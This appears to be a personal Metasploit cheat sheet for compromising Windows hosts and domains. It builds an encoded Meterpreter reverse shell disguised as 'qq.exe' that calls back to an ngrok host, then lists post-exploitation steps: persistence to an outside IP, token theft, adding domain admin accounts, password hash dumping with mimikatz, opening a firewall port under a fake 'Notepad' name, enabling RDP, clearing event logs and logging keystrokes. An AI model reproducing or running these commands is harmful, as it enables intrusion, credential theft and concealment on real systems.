msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00‘ LHOST=free.ngrok.cc LPORT=10678 -f c
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00‘ LHOST=free.ngrok.cc LPORT=10678 -f exe -o qq.exe

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.195.45
set lport 10678
exploit -j -z
jobs

sessions -i 1
sysinfo
screenshot
getuid
getsystem
getuid
run post/windows/manage/migrate
run post/windows/manage/priv_migrate
run persistence -X -i 10 -p 10678 -r 47.90.92.56
background

ps
steal_token PID
drop_token
getuid

use incognito
help incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\USERNAME
add_user domainuser password -h 192.168.195.191
add_group_user "Domain Admins" domainuser -h 192.168.195.191

run post/windows/gather/smart_hashdump
# http://www.objectif-securite.ch/en/ophcrack.php

use mimikatz
help mimikatz
msv
ssp
kerberos
wdigest
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords

run post/windows/gather/enum_applications
run post/windows/gather/dumplinks

execute -f cmd.exe -i -H -t
net user username userpass /add
net localgroup "Administrators" username /add
net user domainuser userpass /add /DOMAIN
net group "Domain Admins" domainuser /add /DOMAIN
netsh firewall add portopening TCP 10678 "Notepad" ENABLE ALL
wmic RDTOGGLE WHERE ServerName=‘%COMPUTERNAME%‘ call SetAllowTSConnections 1
exit

run post/windows/manage/enable_rdp
run getgui -e
run getgui -u username -p userpass
# rdesktop -u username -p userpass server[:port]

clearev
run post/windows/capture/keylog_recorder